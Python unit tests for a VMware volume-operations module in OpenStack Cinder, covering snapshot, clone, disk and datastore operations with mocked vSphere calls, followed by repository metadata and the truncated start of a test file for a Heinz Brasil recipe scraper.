def test_get_snapshot(self):
    """get_snapshot should find a named snapshot in the backing's tree."""
    # build out the root snapshot tree
    snapshot_name = mock.sentinel.snapshot_name
    snapshot = mock.sentinel.snapshot
    root = mock.Mock(spec=object)
    root.name = 'root'
    node = mock.Mock(spec=object)
    node.name = snapshot_name
    node.snapshot = snapshot
    root.childSnapshotList = [node]
    # Test rootSnapshotList is not None
    snapshot_tree = mock.Mock(spec=object)
    snapshot_tree.rootSnapshotList = [root]
    self.session.invoke_api.return_value = snapshot_tree
    backing = mock.sentinel.backing
    ret = self.vops.get_snapshot(backing, snapshot_name)
    self.assertEqual(snapshot, ret)
    self.session.invoke_api.assert_called_with(vim_util,
                                               'get_object_property',
                                               self.session.vim,
                                               backing,
                                               'snapshot')
    # Test rootSnapshotList == None
    snapshot_tree.rootSnapshotList = None
    ret = self.vops.get_snapshot(backing, snapshot_name)
    self.assertIsNone(ret)
    self.session.invoke_api.assert_called_with(vim_util,
                                               'get_object_property',
                                               self.session.vim,
                                               backing,
                                               'snapshot')
def test_snapshot_exists(self):
    """snapshot_exists is True only when a non-empty root list is present."""
    vm = mock.sentinel.backing
    invoke_api = self.session.invoke_api
    # No 'snapshot' property at all.
    invoke_api.return_value = None
    self.assertFalse(self.vops.snapshot_exists(vm))
    invoke_api.assert_called_once_with(vim_util, 'get_object_property',
                                       self.session.vim, vm, 'snapshot')
    # Property present but root list empty.
    snapshot_prop = mock.Mock()
    snapshot_prop.rootSnapshotList = None
    invoke_api.return_value = snapshot_prop
    self.assertFalse(self.vops.snapshot_exists(vm))
    # Non-empty root list.
    snapshot_prop.rootSnapshotList = [mock.Mock()]
    self.assertTrue(self.vops.snapshot_exists(vm))
def test_delete_snapshot(self):
    """delete_snapshot should be a no-op when the snapshot is absent."""
    backing = mock.sentinel.backing
    snapshot_name = mock.sentinel.snapshot_name
    # Test snapshot is None
    with mock.patch.object(self.vops, 'get_snapshot') as get_snapshot:
        get_snapshot.return_value = None
        self.vops.delete_snapshot(backing, snapshot_name)
        get_snapshot.assert_called_once_with(backing, snapshot_name)
    # Test snapshot is not None
    snapshot = mock.sentinel.snapshot
    task = mock.sentinel.task
    invoke_api = self.session.invoke_api
    invoke_api.return_value = task
    with mock.patch.object(self.vops, 'get_snapshot') as get_snapshot:
        get_snapshot.return_value = snapshot
        self.vops.delete_snapshot(backing, snapshot_name)
        get_snapshot.assert_called_with(backing, snapshot_name)
        # removeChildren=False: only the named snapshot is removed.
        invoke_api.assert_called_once_with(self.session.vim,
                                           'RemoveSnapshot_Task',
                                           snapshot, removeChildren=False)
        self.session.wait_for_task.assert_called_once_with(task)
def test_get_folder(self):
    """_get_folder should delegate to _get_parent with type 'Folder'."""
    expected_folder = mock.sentinel.folder
    vm = mock.sentinel.backing
    with mock.patch.object(self.vops, '_get_parent') as get_parent:
        get_parent.return_value = expected_folder
        self.assertEqual(expected_folder, self.vops._get_folder(vm))
        get_parent.assert_called_once_with(vm, 'Folder')
def _verify_extra_config(self, option_values, key, value):
    """Assert option_values holds exactly one entry with the given key/value."""
    self.assertEqual(1, len(option_values))
    entry = option_values[0]
    self.assertEqual(key, entry.key)
    self.assertEqual(value, entry.value)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
            '_get_relocate_spec')
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
            '_get_disk_device')
def test_get_clone_spec(self, get_disk_device, get_relocate_spec):
    """Verify _get_clone_spec with and without an explicit disk type."""
    factory = self.session.vim.client.factory
    factory.create.side_effect = lambda *args: mock.Mock()
    relocate_spec = mock.sentinel.relocate_spec
    get_relocate_spec.return_value = relocate_spec
    # Test with empty disk type.
    datastore = mock.sentinel.datastore
    disk_move_type = mock.sentinel.disk_move_type
    snapshot = mock.sentinel.snapshot
    disk_type = None
    backing = mock.sentinel.backing
    host = mock.sentinel.host
    rp = mock.sentinel.rp
    key = mock.sentinel.key
    value = mock.sentinel.value
    extra_config = {key: value}
    ret = self.vops._get_clone_spec(datastore, disk_move_type, snapshot,
                                    backing, disk_type, host, rp,
                                    extra_config)
    self.assertEqual(relocate_spec, ret.location)
    # Clones are created powered off and as real VMs, not templates.
    self.assertFalse(ret.powerOn)
    self.assertFalse(ret.template)
    self.assertEqual(snapshot, ret.snapshot)
    # With disk_type=None, no disk device is passed to the relocate spec.
    get_relocate_spec.assert_called_once_with(datastore, rp, host,
                                              disk_move_type, disk_type,
                                              None)
    self._verify_extra_config(ret.config.extraConfig, key, value)
    # Test with non-empty disk type.
    disk_device = mock.sentinel.disk_device
    get_disk_device.return_value = disk_device
    disk_type = 'thin'
    ret = self.vops._get_clone_spec(datastore, disk_move_type, snapshot,
                                    backing, disk_type, host, rp,
                                    extra_config)
    factory.create.side_effect = None
    self.assertEqual(relocate_spec, ret.location)
    self.assertFalse(ret.powerOn)
    self.assertFalse(ret.template)
    self.assertEqual(snapshot, ret.snapshot)
    get_disk_device.assert_called_once_with(backing)
    get_relocate_spec.assert_called_with(datastore, rp, host,
                                         disk_move_type, disk_type,
                                         disk_device)
    self._verify_extra_config(ret.config.extraConfig, key, value)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
            '_get_clone_spec')
def test_clone_backing(self, get_clone_spec):
    """Exercise clone_backing for full, linked, and fully-parameterized clones."""
    folder = mock.Mock(name='folder', spec=object)
    folder._type = 'Folder'
    task = mock.sentinel.task
    # Three sub-cases below; each consumes (parent-folder lookup, task).
    self.session.invoke_api.side_effect = [folder, task, folder, task,
                                           folder, task]
    task_info = mock.Mock(spec=object)
    task_info.result = mock.sentinel.new_backing
    self.session.wait_for_task.return_value = task_info
    clone_spec = mock.sentinel.clone_spec
    get_clone_spec.return_value = clone_spec
    # Test non-linked clone_backing
    name = mock.sentinel.name
    backing = mock.Mock(spec=object)
    backing._type = 'VirtualMachine'
    snapshot = mock.sentinel.snapshot
    clone_type = "anything-other-than-linked"
    datastore = mock.sentinel.datstore
    ret = self.vops.clone_backing(name, backing, snapshot, clone_type,
                                  datastore)
    # verify calls
    self.assertEqual(mock.sentinel.new_backing, ret)
    # Full clone: all disk backings are moved, no sharing.
    disk_move_type = 'moveAllDiskBackingsAndDisallowSharing'
    get_clone_spec.assert_called_with(
        datastore, disk_move_type, snapshot, backing, None, host=None,
        resource_pool=None, extra_config=None)
    expected = [mock.call(vim_util, 'get_object_property',
                          self.session.vim, backing, 'parent'),
                mock.call(self.session.vim, 'CloneVM_Task', backing,
                          folder=folder, name=name, spec=clone_spec)]
    self.assertEqual(expected, self.session.invoke_api.mock_calls)
    # Test linked clone_backing
    clone_type = volumeops.LINKED_CLONE_TYPE
    self.session.invoke_api.reset_mock()
    ret = self.vops.clone_backing(name, backing, snapshot, clone_type,
                                  datastore)
    # verify calls
    self.assertEqual(mock.sentinel.new_backing, ret)
    # Linked clone: a child disk backing is created off the snapshot.
    disk_move_type = 'createNewChildDiskBacking'
    get_clone_spec.assert_called_with(
        datastore, disk_move_type, snapshot, backing, None, host=None,
        resource_pool=None, extra_config=None)
    expected = [mock.call(vim_util, 'get_object_property',
                          self.session.vim, backing, 'parent'),
                mock.call(self.session.vim, 'CloneVM_Task', backing,
                          folder=folder, name=name, spec=clone_spec)]
    self.assertEqual(expected, self.session.invoke_api.mock_calls)
    # Test with optional params (disk_type, host, resource_pool and
    # extra_config).
    clone_type = None
    disk_type = 'thin'
    host = mock.sentinel.host
    rp = mock.sentinel.rp
    extra_config = mock.sentinel.extra_config
    self.session.invoke_api.reset_mock()
    ret = self.vops.clone_backing(name, backing, snapshot, clone_type,
                                  datastore, disk_type, host, rp,
                                  extra_config)
    self.assertEqual(mock.sentinel.new_backing, ret)
    disk_move_type = 'moveAllDiskBackingsAndDisallowSharing'
    get_clone_spec.assert_called_with(
        datastore, disk_move_type, snapshot, backing, disk_type, host=host,
        resource_pool=rp, extra_config=extra_config)
    expected = [mock.call(vim_util, 'get_object_property',
                          self.session.vim, backing, 'parent'),
                mock.call(self.session.vim, 'CloneVM_Task', backing,
                          folder=folder, name=name, spec=clone_spec)]
    self.assertEqual(expected, self.session.invoke_api.mock_calls)
    # Clear side effects.
    self.session.invoke_api.side_effect = None
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
            '_create_specs_for_disk_add')
def test_attach_disk_to_backing(self, create_spec):
    """attach_disk_to_backing should reconfigure the VM with disk-add specs."""
    reconfig_spec = mock.Mock()
    self.session.vim.client.factory.create.return_value = reconfig_spec
    disk_add_config_specs = mock.Mock()
    create_spec.return_value = disk_add_config_specs
    task = mock.Mock()
    self.session.invoke_api.return_value = task
    backing = mock.Mock()
    size_in_kb = units.Ki
    disk_type = "thin"
    adapter_type = "ide"
    vmdk_ds_file_path = mock.Mock()
    self.vops.attach_disk_to_backing(backing, size_in_kb, disk_type,
                                     adapter_type, vmdk_ds_file_path)
    self.assertEqual(disk_add_config_specs, reconfig_spec.deviceChange)
    create_spec.assert_called_once_with(size_in_kb, disk_type,
                                        adapter_type,
                                        vmdk_ds_file_path)
    self.session.invoke_api.assert_called_once_with(self.session.vim,
                                                    "ReconfigVM_Task",
                                                    backing,
                                                    spec=reconfig_spec)
    self.session.wait_for_task.assert_called_once_with(task)
def test_rename_backing(self):
    """rename_backing should run Rename_Task and wait for completion."""
    task = mock.sentinel.task
    self.session.invoke_api.return_value = task
    vm = mock.sentinel.backing
    new_name = mock.sentinel.new_name
    self.vops.rename_backing(vm, new_name)
    self.session.invoke_api.assert_called_once_with(
        self.session.vim, "Rename_Task", vm, newName=new_name)
    self.session.wait_for_task.assert_called_once_with(task)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
            '_get_disk_device')
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
            '_reconfigure_backing')
def test_update_backing_disk_uuid(self, reconfigure_backing,
                                  get_disk_device):
    """update_backing_disk_uuid should edit the disk device's backing uuid."""
    disk_spec = mock.Mock()
    reconfig_spec = mock.Mock()
    # The method creates a device spec first, then a VM config spec.
    self.session.vim.client.factory.create.side_effect = [disk_spec,
                                                          reconfig_spec]
    disk_device = mock.Mock()
    get_disk_device.return_value = disk_device
    self.vops.update_backing_disk_uuid(mock.sentinel.backing,
                                       mock.sentinel.disk_uuid)
    get_disk_device.assert_called_once_with(mock.sentinel.backing)
    self.assertEqual(mock.sentinel.disk_uuid, disk_device.backing.uuid)
    self.assertEqual('edit', disk_spec.operation)
    self.assertEqual(disk_device, disk_spec.device)
    self.assertEqual([disk_spec], reconfig_spec.deviceChange)
    reconfigure_backing.assert_called_once_with(mock.sentinel.backing,
                                                reconfig_spec)
    exp_factory_create_calls = [mock.call('ns0:VirtualDeviceConfigSpec'),
                                mock.call('ns0:VirtualMachineConfigSpec')]
    self.assertEqual(exp_factory_create_calls,
                     self.session.vim.client.factory.create.call_args_list)
def test_change_backing_profile(self):
    """change_backing_profile should reconfigure the VM's storage profile."""
    # Test change to empty profile.
    reconfig_spec = mock.Mock()
    empty_profile_spec = mock.sentinel.empty_profile_spec
    self.session.vim.client.factory.create.side_effect = [
        reconfig_spec, empty_profile_spec]
    task = mock.sentinel.task
    self.session.invoke_api.return_value = task
    backing = mock.sentinel.backing
    unique_profile_id = mock.sentinel.unique_profile_id
    profile_id = mock.Mock(uniqueId=unique_profile_id)
    self.vops.change_backing_profile(backing, profile_id)
    self.assertEqual([empty_profile_spec], reconfig_spec.vmProfile)
    self.session.invoke_api.assert_called_once_with(self.session.vim,
                                                    "ReconfigVM_Task",
                                                    backing,
                                                    spec=reconfig_spec)
    self.session.wait_for_task.assert_called_once_with(task)
    # Test change to non-empty profile.
    profile_spec = mock.Mock()
    self.session.vim.client.factory.create.side_effect = [
        reconfig_spec, profile_spec]
    self.session.invoke_api.reset_mock()
    self.session.wait_for_task.reset_mock()
    self.vops.change_backing_profile(backing, profile_id)
    self.assertEqual([profile_spec], reconfig_spec.vmProfile)
    # The profile spec must carry the profile's uniqueId.
    self.assertEqual(unique_profile_id,
                     reconfig_spec.vmProfile[0].profileId)
    self.session.invoke_api.assert_called_once_with(self.session.vim,
                                                    "ReconfigVM_Task",
                                                    backing,
                                                    spec=reconfig_spec)
    self.session.wait_for_task.assert_called_once_with(task)
    # Clear side effects.
    self.session.vim.client.factory.create.side_effect = None
def test_delete_file(self):
    """delete_file should run DeleteDatastoreFile_Task and wait on it."""
    file_mgr = mock.sentinel.file_manager
    self.session.vim.service_content.fileManager = file_mgr
    task = mock.sentinel.task
    self.session.invoke_api.return_value = task
    path = mock.sentinel.file_path
    dc = mock.sentinel.datacenter
    self.vops.delete_file(path, dc)
    self.session.invoke_api.assert_called_once_with(
        self.session.vim, 'DeleteDatastoreFile_Task', file_mgr,
        name=path, datacenter=dc)
    self.session.wait_for_task.assert_called_once_with(task)
def test_create_datastore_folder(self):
    """create_datastore_folder should call MakeDirectory on the file manager."""
    file_manager = mock.sentinel.file_manager
    self.session.vim.service_content.fileManager = file_manager
    dc = mock.sentinel.datacenter
    self.vops.create_datastore_folder("nfs", "test/", dc)
    # The folder name is rendered in '[datastore] path' form.
    self.session.invoke_api.assert_called_once_with(
        self.session.vim, 'MakeDirectory', file_manager,
        name="[nfs] test/", datacenter=dc)
def test_create_datastore_folder_with_existing_folder(self):
    """FileAlreadyExists from MakeDirectory must be swallowed silently."""
    file_manager = mock.sentinel.file_manager
    self.session.vim.service_content.fileManager = file_manager
    invoke_api = self.session.invoke_api
    invoke_api.side_effect = exceptions.FileAlreadyExistsException
    dc = mock.sentinel.datacenter
    # Must not raise even though the directory already exists.
    self.vops.create_datastore_folder("nfs", "test/", dc)
    invoke_api.assert_called_once_with(
        self.session.vim, 'MakeDirectory', file_manager,
        name="[nfs] test/", datacenter=dc)
    invoke_api.side_effect = None
def test_create_datastore_folder_with_invoke_api_error(self):
    """Non-'already exists' VIM faults from MakeDirectory must propagate."""
    file_manager = mock.sentinel.file_manager
    self.session.vim.service_content.fileManager = file_manager
    invoke_api = self.session.invoke_api
    invoke_api.side_effect = exceptions.VimFaultException(
        ["FileFault"], "error")
    dc = mock.sentinel.datacenter
    self.assertRaises(exceptions.VimFaultException,
                      self.vops.create_datastore_folder,
                      "nfs", "test/", dc)
    invoke_api.assert_called_once_with(
        self.session.vim, 'MakeDirectory', file_manager,
        name="[nfs] test/", datacenter=dc)
    invoke_api.side_effect = None
def test_get_path_name(self):
    """get_path_name should return config.files.vmPathName."""
    files = mock.Mock(spec=object)
    files.vmPathName = mock.sentinel.vm_path_name
    self.session.invoke_api.return_value = files
    vm = mock.sentinel.backing
    self.assertEqual(mock.sentinel.vm_path_name,
                     self.vops.get_path_name(vm))
    self.session.invoke_api.assert_called_once_with(
        vim_util, 'get_object_property', self.session.vim, vm,
        'config.files')
def test_get_entity_name(self):
    """get_entity_name should read the 'name' property of the entity."""
    self.session.invoke_api.return_value = mock.sentinel.entity_name
    entity = mock.sentinel.entity
    self.assertEqual(mock.sentinel.entity_name,
                     self.vops.get_entity_name(entity))
    self.session.invoke_api.assert_called_once_with(
        vim_util, 'get_object_property', self.session.vim, entity, 'name')
def test_get_vmdk_path(self):
    """get_vmdk_path returns the flat backing's file name and rejects
    non-flat backings and disk-less VMs.
    """
    # Setup hardware_devices for test: a VirtualDisk with a flat backing.
    device = mock.Mock()
    device.__class__.__name__ = 'VirtualDisk'
    backing = mock.Mock()
    backing.__class__.__name__ = 'VirtualDiskFlatVer2BackingInfo'
    backing.fileName = mock.sentinel.vmdk_path
    device.backing = backing
    invoke_api = self.session.invoke_api
    invoke_api.return_value = [device]
    # Test get_vmdk_path
    ret = self.vops.get_vmdk_path(backing)
    self.assertEqual(mock.sentinel.vmdk_path, ret)
    invoke_api.assert_called_once_with(vim_util, 'get_object_property',
                                       self.session.vim, backing,
                                       'config.hardware.device')
    # A non-flat (sparse) backing must be rejected. Fixed a stray leading
    # space in the class name so this exercises a real vSphere type name.
    backing.__class__.__name__ = 'VirtualDiskSparseVer2BackingInfo'
    self.assertRaises(AssertionError, self.vops.get_vmdk_path, backing)
    # Test with no disk device.
    invoke_api.return_value = []
    self.assertRaises(vmdk_exceptions.VirtualDiskNotFoundException,
                      self.vops.get_vmdk_path,
                      backing)
def test_get_disk_size(self):
    """get_disk_size converts capacityInKB to bytes and raises when the
    backing has no virtual disk.
    """
    # Test with valid disk device.
    device = mock.Mock()
    device.__class__.__name__ = 'VirtualDisk'
    disk_size_bytes = 1024
    # Use integer (floor) division: capacityInKB is an integral KB count;
    # '/' would produce a float under Python 3.
    device.capacityInKB = disk_size_bytes // units.Ki
    invoke_api = self.session.invoke_api
    invoke_api.return_value = [device]
    self.assertEqual(disk_size_bytes,
                     self.vops.get_disk_size(mock.sentinel.backing))
    # Test with no disk device.
    invoke_api.return_value = []
    self.assertRaises(vmdk_exceptions.VirtualDiskNotFoundException,
                      self.vops.get_disk_size,
                      mock.sentinel.backing)
def test_create_virtual_disk(self):
    """create_virtual_disk should build a spec and run CreateVirtualDisk_Task."""
    task = mock.Mock()
    invoke_api = self.session.invoke_api
    invoke_api.return_value = task
    spec = mock.Mock()
    factory = self.session.vim.client.factory
    factory.create.return_value = spec
    disk_mgr = self.session.vim.service_content.virtualDiskManager
    dc_ref = mock.Mock()
    vmdk_ds_file_path = mock.Mock()
    size_in_kb = 1024
    adapter_type = 'ide'
    disk_type = 'thick'
    self.vops.create_virtual_disk(dc_ref, vmdk_ds_file_path, size_in_kb,
                                  adapter_type, disk_type)
    # Adapter and disk type strings must be mapped to the API constants.
    self.assertEqual(volumeops.VirtualDiskAdapterType.IDE,
                     spec.adapterType)
    self.assertEqual(volumeops.VirtualDiskType.PREALLOCATED, spec.diskType)
    self.assertEqual(size_in_kb, spec.capacityKb)
    invoke_api.assert_called_once_with(self.session.vim,
                                       'CreateVirtualDisk_Task',
                                       disk_mgr,
                                       name=vmdk_ds_file_path,
                                       datacenter=dc_ref,
                                       spec=spec)
    self.session.wait_for_task.assert_called_once_with(task)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
            'create_virtual_disk')
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
            'delete_file')
def test_create_flat_extent_virtual_disk_descriptor(self, delete_file,
                                                    create_virtual_disk):
    """Creating a descriptor should create the disk, then drop its flat extent."""
    dc_ref = mock.Mock()
    path = mock.Mock()
    size_in_kb = 1024
    adapter_type = 'ide'
    disk_type = 'thick'
    self.vops.create_flat_extent_virtual_disk_descriptor(dc_ref,
                                                         path,
                                                         size_in_kb,
                                                         adapter_type,
                                                         disk_type)
    create_virtual_disk.assert_called_once_with(
        dc_ref, path.get_descriptor_ds_file_path(), size_in_kb,
        adapter_type, disk_type)
    # Only the flat-extent data file is deleted; the descriptor remains.
    delete_file.assert_called_once_with(
        path.get_flat_extent_ds_file_path(), dc_ref)
def test_copy_vmdk_file(self):
    """copy_vmdk_file should copy across datacenters via CopyVirtualDisk_Task."""
    task = mock.sentinel.task
    self.session.invoke_api.return_value = task
    disk_mgr = self.session.vim.service_content.virtualDiskManager
    src_dc = mock.sentinel.src_dc_ref
    dest_dc = mock.sentinel.dest_dc_ref
    src_path = mock.sentinel.src_vmdk_file_path
    dest_path = mock.sentinel.dest_vmdk_file_path
    self.vops.copy_vmdk_file(src_dc, src_path, dest_path, dest_dc)
    self.session.invoke_api.assert_called_once_with(
        self.session.vim, 'CopyVirtualDisk_Task', disk_mgr,
        sourceName=src_path, sourceDatacenter=src_dc,
        destName=dest_path, destDatacenter=dest_dc, force=True)
    self.session.wait_for_task.assert_called_once_with(task)
def test_copy_vmdk_file_with_default_dest_datacenter(self):
    """Omitting the destination datacenter should default it to the source."""
    task = mock.sentinel.task
    self.session.invoke_api.return_value = task
    disk_mgr = self.session.vim.service_content.virtualDiskManager
    src_dc = mock.sentinel.src_dc_ref
    src_path = mock.sentinel.src_vmdk_file_path
    dest_path = mock.sentinel.dest_vmdk_file_path
    self.vops.copy_vmdk_file(src_dc, src_path, dest_path)
    # destDatacenter falls back to the source datacenter.
    self.session.invoke_api.assert_called_once_with(
        self.session.vim, 'CopyVirtualDisk_Task', disk_mgr,
        sourceName=src_path, sourceDatacenter=src_dc,
        destName=dest_path, destDatacenter=src_dc, force=True)
    self.session.wait_for_task.assert_called_once_with(task)
def test_delete_vmdk_file(self):
    """delete_vmdk_file should run DeleteVirtualDisk_Task and wait on it."""
    task = mock.sentinel.task
    self.session.invoke_api.return_value = task
    disk_mgr = self.session.vim.service_content.virtualDiskManager
    dc_ref = self.session.dc_ref
    path = self.session.vmdk_file
    self.vops.delete_vmdk_file(path, dc_ref)
    self.session.invoke_api.assert_called_once_with(
        self.session.vim, 'DeleteVirtualDisk_Task', disk_mgr,
        name=path, datacenter=dc_ref)
    self.session.wait_for_task.assert_called_once_with(task)
@mock.patch('oslo_vmware.pbm.get_profiles_by_ids')
@mock.patch('oslo_vmware.pbm.get_profiles')
def test_get_profile(self, get_profiles, get_profiles_by_ids):
    """get_profile should resolve the backing's profile id to its name."""
    profile_ids = [mock.sentinel.profile_id]
    get_profiles.return_value = profile_ids
    profile = mock.Mock()
    profile.name = mock.sentinel.profile_name
    get_profiles_by_ids.return_value = [profile]
    vm = mock.sentinel.backing
    self.assertEqual(mock.sentinel.profile_name,
                     self.vops.get_profile(vm))
    get_profiles.assert_called_once_with(self.session, vm)
    get_profiles_by_ids.assert_called_once_with(self.session, profile_ids)
@mock.patch('oslo_vmware.pbm.get_profiles_by_ids')
@mock.patch('oslo_vmware.pbm.get_profiles')
def test_get_profile_with_no_profile(self, get_profiles,
                                     get_profiles_by_ids):
    """With no profile ids, get_profile returns None and skips id lookup."""
    get_profiles.return_value = []
    backing = mock.sentinel.backing

    self.assertIsNone(self.vops.get_profile(backing))
    get_profiles.assert_called_once_with(self.session, backing)
    # The id->profile resolution must not run when there is nothing to resolve.
    self.assertFalse(get_profiles_by_ids.called)
def test_extend_virtual_disk(self):
    """Extend delegates to ExtendVirtualDisk_Task with the size in KB."""
    fake_task = mock.sentinel.task
    api = self.session.invoke_api
    api.return_value = fake_task
    virtual_disk_mgr = self.session.vim.service_content.virtualDiskManager
    size_gb = 5
    size_kb = size_gb * units.Mi
    volume_name = 'fake_volume_0000000001'
    datacenter = mock.sentinel.datacenter

    self.vops.extend_virtual_disk(size_gb, volume_name, datacenter)

    api.assert_called_once_with(self.session.vim,
                                "ExtendVirtualDisk_Task",
                                virtual_disk_mgr,
                                name=volume_name,
                                datacenter=datacenter,
                                newCapacityKb=size_kb,
                                eagerZero=False)
    self.session.wait_for_task.assert_called_once_with(fake_task)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
            '_get_all_clusters')
def test_get_cluster_refs(self, get_all_clusters):
    """Only the requested cluster names are returned."""
    all_clusters = {"cls_1": mock.sentinel.cls_1,
                    "cls_2": mock.sentinel.cls_2}
    get_all_clusters.return_value = all_clusters

    self.assertEqual({"cls_2": all_clusters["cls_2"]},
                     self.vops.get_cluster_refs(["cls_2"]))
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
            '_get_all_clusters')
def test_get_cluster_refs_with_invalid_cluster(self, get_all_clusters):
    """Asking for an unknown cluster raises ClusterNotFoundException."""
    get_all_clusters.return_value = {"cls_1": mock.sentinel.cls_1,
                                     "cls_2": mock.sentinel.cls_2}

    self.assertRaises(vmdk_exceptions.ClusterNotFoundException,
                      self.vops.get_cluster_refs,
                      ["cls_1", "cls_3"])
def test_get_cluster_hosts(self):
    """Cluster hosts are read from the cluster's 'host' object property."""
    host_a = mock.sentinel.host_1
    host_b = mock.sentinel.host_2
    self.session.invoke_api.return_value = mock.Mock(
        ManagedObjectReference=[host_a, host_b])
    cluster = mock.sentinel.cluster

    self.assertEqual([host_a, host_b],
                     self.vops.get_cluster_hosts(cluster))
    self.session.invoke_api.assert_called_once_with(vim_util,
                                                    'get_object_property',
                                                    self.session.vim,
                                                    cluster,
                                                    'host')
def test_get_cluster_hosts_with_no_host(self):
    """A cluster with no 'host' property yields an empty list."""
    self.session.invoke_api.return_value = None
    cluster = mock.sentinel.cluster

    self.assertEqual([], self.vops.get_cluster_hosts(cluster))
    self.session.invoke_api.assert_called_once_with(vim_util,
                                                    'get_object_property',
                                                    self.session.vim,
                                                    cluster,
                                                    'host')
class VirtualDiskPathTest(test.TestCase):
    """Unit tests for VirtualDiskPath."""

    def setUp(self):
        super(VirtualDiskPathTest, self).setUp()
        self._path = volumeops.VirtualDiskPath("nfs", "A/B/", "disk")

    def test_get_datastore_file_path(self):
        expected = "[nfs] A/B/disk.vmdk"
        self.assertEqual(expected,
                         self._path.get_datastore_file_path("nfs",
                                                            "A/B/disk.vmdk"))

    def test_get_descriptor_file_path(self):
        expected = "A/B/disk.vmdk"
        self.assertEqual(expected, self._path.get_descriptor_file_path())

    def test_get_descriptor_ds_file_path(self):
        expected = "[nfs] A/B/disk.vmdk"
        self.assertEqual(expected, self._path.get_descriptor_ds_file_path())
class FlatExtentVirtualDiskPathTest(test.TestCase):
    """Unit tests for FlatExtentVirtualDiskPath."""

    def setUp(self):
        super(FlatExtentVirtualDiskPathTest, self).setUp()
        self._path = volumeops.FlatExtentVirtualDiskPath("nfs", "A/B/", "disk")

    def test_get_flat_extent_file_path(self):
        expected = "A/B/disk-flat.vmdk"
        self.assertEqual(expected, self._path.get_flat_extent_file_path())

    def test_get_flat_extent_ds_file_path(self):
        expected = "[nfs] A/B/disk-flat.vmdk"
        self.assertEqual(expected, self._path.get_flat_extent_ds_file_path())
class VirtualDiskTypeTest(test.TestCase):
    """Unit tests for VirtualDiskType."""

    def test_is_valid(self):
        # All three supported disk types validate; anything else does not.
        for disk_type in ("thick", "thin", "eagerZeroedThick"):
            self.assertTrue(volumeops.VirtualDiskType.is_valid(disk_type))
        self.assertFalse(volumeops.VirtualDiskType.is_valid("preallocated"))

    def test_validate(self):
        for disk_type in ("thick", "thin", "eagerZeroedThick"):
            volumeops.VirtualDiskType.validate(disk_type)
        self.assertRaises(vmdk_exceptions.InvalidDiskTypeException,
                          volumeops.VirtualDiskType.validate,
                          "preallocated")

    def test_get_virtual_disk_type(self):
        get = volumeops.VirtualDiskType.get_virtual_disk_type
        # "thick" maps to the vSphere name "preallocated"; others map to
        # themselves.
        self.assertEqual("preallocated", get("thick"))
        self.assertEqual("thin", get("thin"))
        self.assertEqual("eagerZeroedThick", get("eagerZeroedThick"))
        self.assertRaises(vmdk_exceptions.InvalidDiskTypeException,
                          get,
                          "preallocated")
class VirtualDiskAdapterTypeTest(test.TestCase):
    """Unit tests for VirtualDiskAdapterType."""

    def test_is_valid(self):
        for adapter in ("lsiLogic", "busLogic", "lsiLogicsas", "ide"):
            self.assertTrue(volumeops.VirtualDiskAdapterType.is_valid(adapter))
        self.assertFalse(volumeops.VirtualDiskAdapterType.is_valid("pvscsi"))

    def test_validate(self):
        for adapter in ("lsiLogic", "busLogic", "lsiLogicsas", "ide"):
            volumeops.VirtualDiskAdapterType.validate(adapter)
        self.assertRaises(vmdk_exceptions.InvalidAdapterTypeException,
                          volumeops.VirtualDiskAdapterType.validate,
                          "pvscsi")

    def test_get_adapter_type(self):
        get = volumeops.VirtualDiskAdapterType.get_adapter_type
        # "lsiLogicsas" disks are created through the plain lsiLogic
        # adapter; the rest map to themselves.
        for given, expected in (("lsiLogic", "lsiLogic"),
                                ("busLogic", "busLogic"),
                                ("lsiLogicsas", "lsiLogic"),
                                ("ide", "ide")):
            self.assertEqual(expected, get(given))
        self.assertRaises(vmdk_exceptions.InvalidAdapterTypeException,
                          get,
                          "pvscsi")
class ControllerTypeTest(test.TestCase):
    """Unit tests for ControllerType."""

    def test_get_controller_type(self):
        get = volumeops.ControllerType.get_controller_type
        expected = {'lsiLogic': volumeops.ControllerType.LSI_LOGIC,
                    'busLogic': volumeops.ControllerType.BUS_LOGIC,
                    'lsiLogicsas': volumeops.ControllerType.LSI_LOGIC_SAS,
                    'ide': volumeops.ControllerType.IDE}
        for adapter_type, controller in expected.items():
            self.assertEqual(controller, get(adapter_type))
        self.assertRaises(vmdk_exceptions.InvalidAdapterTypeException,
                          get,
                          'invalid_type')

    def test_is_scsi_controller(self):
        is_scsi = volumeops.ControllerType.is_scsi_controller
        # All SCSI variants are detected; IDE is not SCSI.
        for controller in (volumeops.ControllerType.LSI_LOGIC,
                           volumeops.ControllerType.BUS_LOGIC,
                           volumeops.ControllerType.LSI_LOGIC_SAS):
            self.assertTrue(is_scsi(controller))
        self.assertFalse(is_scsi(volumeops.ControllerType.IDE))
| {
"content_hash": "4634b08d74b59a054333b728afbdef40",
"timestamp": "",
"source": "github",
"line_count": 1754,
"max_line_length": 79,
"avg_line_length": 45.754275940706954,
"alnum_prop": 0.5506834635465341,
"repo_name": "petrutlucian94/cinder",
"id": "fbad28415361013b189c9b2015dd1d31c30d7ca6",
"size": "80885",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cinder/tests/unit/test_vmware_volumeops.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "12246766"
},
{
"name": "Shell",
"bytes": "8111"
}
],
"symlink_target": ""
} |
from recipe_scrapers.heinzbrasil import HeinzBrasil
from tests import ScraperTest
class TestHeinzBrasilScraper(ScraperTest):
    """Scraper tests for heinzbrasil.com.br (Brazilian-Portuguese recipes).

    ScraperTest (base class) loads a cached HTML fixture and exposes the
    parsed scraper as self.harvester_class; each test checks one extracted
    field against the known fixture content.
    """

    # Scraper implementation under test.
    scraper_class = HeinzBrasil

    def test_host(self):
        self.assertEqual("heinzbrasil.com.br", self.harvester_class.host())

    def test_canonical_url(self):
        self.assertEqual(
